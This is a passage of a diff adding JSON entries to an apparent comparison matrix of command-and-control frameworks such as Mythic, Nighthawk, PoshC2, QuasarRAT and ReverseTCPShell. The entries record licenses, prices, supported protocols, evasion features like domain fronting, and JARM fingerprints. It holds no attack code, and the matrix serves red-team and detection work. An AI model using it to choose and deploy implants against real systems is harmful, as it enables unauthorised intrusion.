"version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Mythic", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/its-a-feature/Mythic", + "site": "https://docs.mythic-c2.net/", + "twitter": "@its_a_feature_", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "1.3", + "implementation": "Docker", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "No", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb", + "actively_maint": "Yes", + "slack": "#ApFell bloodhoundgang.herokuapp.com", + "slack_members": "180", + "gh_issues": "14", + "notes": "" + }, + { + "name": "Mythic-Apollo", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/MythicAgents/Apollo", + "site": "", + "twitter": "@djhohnstein", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Implant for Mythic" + }, + { + "name": "Mythic-Medusa", + "license": "NA", + "price": "NA", + "github": "https://github.com/MythicAgents/Medusa", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nebula", + "license": "MIT", + "price": "NA", + "github": "https://github.com/gl4ssesbo1/Nebula", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nighthawk", + "license": "Commercial", + "price": "\u00c2\u00a322,500", + "github": "", + "site": "https://www.mdsec.co.uk/nighthawk/", + "twitter": "@MDSecLabs", + "evaluator": "@domchell", + "date": "12/16/2021", + "version": "0.1", + "implementation": "Binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "No", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "Yes", + "http3": "Yes", + "dns": "Yes", + "doh": "Yes", + "icmp": "Yes", + "ftp": "Yes", + "imap": "Yes", + "mapi": "Yes", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "Yes", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Ninja", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/ahmedkhlief/Ninja/", + "site": "https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "4/3/2020", + "version": "Beta", + "implementation": "python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#/PowerShell", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "4", + "notes": "Built on top of leaked MuddyC3" + }, + { + "name": "NorthStarC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/EnginDemirbilek/NorthStarC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nuages", + "license": "NA", + "price": "NA", + "github": "https://github.com/p3nt4/Nuages", + "site": "", + "twitter": "@xp3nt4", + "evaluator": "@xp3nt4", + "date": "11/12/2019", + "version": "1", + "implementation": "Node.Js", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#", + "multi_user": "Yes", + "ui": "Cli", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Implants can be built and customized easily" + }, + { + "name": "Octopus", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/mhaskar/Octopus", + "site": "https://shells.systems/unveiling-octopus-the-pre-operation-c2-for-red-teamers/", + "twitter": "@mohammadaskar2", + "evaluator": "@jorgeorchilles", + "date": "12/12/2019", + "version": "v1.0 Beta", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "PowerShell", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "3", + "notes": "" + }, + { + "name": "OffensiveNotion", + "license": "MIT", + "price": "NA", + "github": "https://github.com/mttaggart/OffensiveNotion", + "site": "", + "twitter": "@mttaggart @huskyhacksmk", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "OST Stage 1", + "license": "Commercial", + "price": "Check Site", + "github": "", + "site": "https://outflank.nl/services/outflank-security-tooling/", + "twitter": "@OutflankNL", + "evaluator": "@MarcOverIP", + "date": "11/5/2021", + "version": "SaaS", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "", + "macos": "", + "tcp": "", + "http": "Yes", + "http2": "Yes", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "Yes", + "stego": "", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "", + "kill_date": "Yes", + "chaining": "", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "Yes, private", + "slack_members": "", + "gh_issues": "", + "notes": "Focus on Stage 1 type of functionality. Available as part of larger OST offering with multiple initial access and post-ex capabilities" + }, + { + "name": "Oyabun C2", + "license": "Commercial", + "price": "$200", + "github": "", + "site": "https://redcodelabs.io/oyabun/", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Palinka", + "license": "NA", + "price": "NA", + "github": "https://github.com/lapolis/palinka_c2", + "site": "", + "twitter": "@l4p0lis", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PetaQ", + "license": "MIT", + "price": "NA", + "github": "https://github.com/fozavci/petaqc2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PickleC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/xRET2pwn/PickleC2", + "site": "https://picklec2.readthedocs.io/en/latest/", + "twitter": "@RET2_pwn", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "PowerShell", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PoshC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/nettitude/PoshC2/", + "site": "https://poshc2.readthedocs.io/en/latest/", + "twitter": "@Nettitude_Labs", + "evaluator": "@jorgeorchilles", + "date": "9/11/2021", + "version": "7.4.0", + "implementation": "install.sh", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell/C#/Python", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "Yes", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261", + "actively_maint": "Yes", + "slack": "poshc2.slack.com", + "slack_members": "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", + "gh_issues": "44", + "notes": "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/" + }, + { + "name": "PowerHub", + "license": "MIT", + "price": "NA", + "github": "https://github.com/AdrianVollmer/PowerHub", + "site": "", + "twitter": "@mr_mitm", + "evaluator": "@jorgeorchilles", + "date": "11/15/2019", + "version": "1.3", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "38", + "notes": "" + }, + { + "name": "Prelude", + "license": "Commercial", + "price": "Check Site", + "github": "https://github.com/preludeorg/", + "site": "https://www.prelude.org/", + "twitter": "@preludeorg", + "evaluator": "@bfuzzy1", + "date": "1/15/2021", + "version": "0.9.12", + "implementation": "Binary", + "how_to": "No", + "slingshot": "No", + "kali": "No", + "server": "NodeJS", + "implant": "Go/Python/JS", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Pre-shared key/TLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "No", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "N/A", + "gh_issues": "6", + "notes": "Community is free, Professional $50 per user, Enterprise $1,000 a month up to 10 users" + }, + { + "name": "Prismatica", + "license": "MIT", + "price": "NA", + "github": "https://github.com/Project-Prismatica", + "site": "http://prismatica.io/", + "twitter": "@PPrismatica", + "evaluator": "@0sm0s1z", + "date": "11/13/2019", + "version": "0.01", + "implementation": "Docker", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Javascript/Python", + "implant": "JScript/.NET/Rust", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "" + }, + { + "name": "Proton", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/entynetproject/proton", + "site": "", + "twitter": "@enty8080", + "evaluator": "Contribute", + "date": "", + "version": "5", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "JScript/VBScript", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "No", + "slack_members": "NA", + "gh_issues": "4", + "notes": "" + }, + { + "name": "Pupy", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/n1nj4sec/pupy", + "site": "", + "twitter": "@n1nj4sec", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "596", + "notes": "" + }, + { + "name": "QuasarRAT", + "license": "MIT", + "price": "NA", + "github": "https://github.com/quasar/QuasarRAT", + "site": "", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "5/20/2020", + "version": "1.3.0.0", + "implementation": "C#", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "C#", + "implant": "C#", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "529", + "notes": "" + }, + { + "name": "RATel", + "license": "MIT", + "price": "NA", + "github": "https://github.com/FrenchCisco/RATel", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Red Team Toolkit", + "license": "Commercial", + "price": "$7,000", + "github": "", + "site": "https://www.netspi.com/technology/red-team-toolkit/", + "twitter": "@SilentBreakSec", + "evaluator": "@dmay3r", + "date": "11/22/2019", + "version": "2.63", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "RedHerd Framework", + "license": "MIT", + "price": "NA", + "github": "https://github.com/redherd-project/redherd-framework", + "site": "https://redherd.readthedocs.io", + "twitter": "@RedHerdProject", + "evaluator": "", + "date": "9/29/2021", + "version": "0.0.4", + "implementation": "JavaScript / Docker", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Node.js", + "implant": "NA", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes*", + "linux": "Yes*", + "macos": "Yes*", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "Yes (SSH)", + "stego": "NA", + "proxy_aware": "NA", + "domainfront": "NA", + "custom_profile": "NA", + "jitter": "NA", + "working_hours": "NA", + "kill_date": "NA", + "chaining": "NA", + "logging": "No", + "in_wild": "", + "attck_mapping": "Yes**", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "(*) Implant refers to the supported OS for the assets. (**) ATT&CK Mapping is easly integrated through custom topics, the default is CKC Mapping." + }, + { + "name": "redViper", + "license": "NA", + "price": "NA", + "github": "https://github.com/itsKindred/redViper", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "ReverseTCPShell", + "license": "NA", + "price": "NA", + "github": "https://github.com/ZHacker13/ReverseTCPShell", + "site": "", + "twitter": "@ZHacker13", + "evaluator": "@jorgeorchilles", + "date": "12/19/2019", + "version": "NA", + "implementation": "PowerShell", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "PowerShell", + "implant": "PowerShell", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + 